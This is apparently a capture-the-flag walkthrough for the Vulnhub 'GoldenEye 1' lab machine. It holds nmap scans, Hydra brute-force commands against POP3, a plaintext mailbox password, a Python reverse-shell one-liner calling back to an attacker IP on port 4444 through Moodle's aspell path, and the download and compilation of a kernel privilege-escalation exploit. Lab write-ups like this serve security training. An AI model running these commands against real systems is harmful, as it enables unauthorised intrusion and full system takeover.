Golden Eye 1

Golden Eye Vulnhub Walkthrough

Enumeration

nmap

nmap -sC -sV -oA nmap/GEv1 192.168.1.116

Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-23 05:18 EDT
Nmap scan report for 192.168.1.116
Host is up (0.00012s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
25/tcp open  smtp    Postfix smtpd
|_smtp-commands: ubuntu, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 
|_ssl-date: TLS randomness does not represent time
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: GoldenEye Primary Admin Server
MAC Address: 00:0C:29:E4:96:14 (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 41.68 seconds

nmap -p- -Pn 192.168.1.116 

Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-23 05:18 EDT
Nmap scan report for 192.168.1.116
Host is up (0.00067s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE
25/tcp    open  smtp
80/tcp    open  http
55006/tcp open  unknown
55007/tcp open  unknown
MAC Address: 00:0C:29:E4:96:14 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 3.55 seconds

We can see that there are 2 more unknown port that are on the server.

Let's put the IP on the web browser

Let's navigate to /sev-home

Then if we go back to the main page and go to the inspect elements we can see a JavaScript file

We can see there is an encrypted password I copied it and paste it at google search bar then we got this surprisingly

Very obvious, the username is boris and we can login.

We can see that there is pop3 server running.

If we use nmap to enumerate both of the unknown ports

nmap -sV -p 55006,55007 192.168.1.116

Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-23 10:28 EDT
Nmap scan report for 192.168.1.116
Host is up (0.00030s latency).

PORT      STATE SERVICE     VERSION
55006/tcp open  ssl/unknown
55007/tcp open  pop3        Dovecot pop3d
MAC Address: 00:0C:29:E4:96:14 (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.42 seconds

We know that 55007 is running pop3

Exploitation

Hydra

Then we can brute force to get the password of boris and natalya

hydra -l boris -P /usr/share/wordlists/fasttrack.txt pop3://192.168.1.116:55007

hydra -l natalya -P /usr/share/wordlists/fasttrack.txt pop3://192.168.1.116:55007

Got the password! we can now login to the pop3 server

nc 192.168.1.116 55007
USER boris
PASS secret1!
LIST
RETR 1
RETR 2 
RETR 3

Nothing seems to be very interesting here, so we move on to the natalya

Doing the same thing as boris, we got something pretty interesting here

We got a credentials and we need to add the server IP to the /etc/hosts and navigate to severnaya-station.com/gnocertdir

After doing that, we can go to the browser and navigate to severnaya-station.com/gnocertdir

We can login with the credentials he given

Then we can navigate to messages and we can see that the username is doak

Now we can take the username doak and brute force using hydra again

hydra -l doak -P /usr/share/wordlists/fasttrack.txt pop3://192.168.1.116:55007

We got the credentials, we then can go to back to the pop3 server and login

We got the credentials and we go back to the Moodle and login

We then go to the private files and we have a s3cret.txt

After cat the file out, we got this

We can see that the picture leads to the admin credentials

We can see that there is a link in the file, if we follow the link,

If we download the picture and use strings command to list out all readable content, we will get this

We can see that there is a base64 encrypted line.

After decode we got

Let's login to the Moodle using the credentials we just got

After playing around, I found out that under site administration, Plugins, and Text Editor, there is a TinyMCE HTML editor

We need to change the Spell engine from Google Spell to PSpellShell

Then, we go to the server and System Path, we can see that there is a Path to aspell section

Reverse Shell

I tried using netcat but it doesn't work so we change the section to Python reverse shell.

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.113",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Then we set up a listener at our machine

nc -nlvp 4444

Then we can go to blog and add new entries

After that click the spelling check to get the reverse shell

Then we can type a python command

python -c 'import pty; pty.spawn("/bin/bash")'

Privilege Escalation

If we type uname -a , we can see that the kernal is out of date

We then can searchsploit the kernal..

After that we can copy to our directory then I tried to transfer the file to the target machine but gcc is not available in the target machine but cc is available.

So we need to change something in the exploit

Change the gcc to cc

Then at our machine we can fire up the SimpleHTTPServer using Python

python -m SimpleHTTPServer

On the target machine navigate to /tmp directory and wget the file

Then we can type

cc 37292.c -o exploit
chmod +x exploit
./exploit

Navigate to the /root and get the .flag.txt

Then we can navigate to the URL it provided

Congratulation !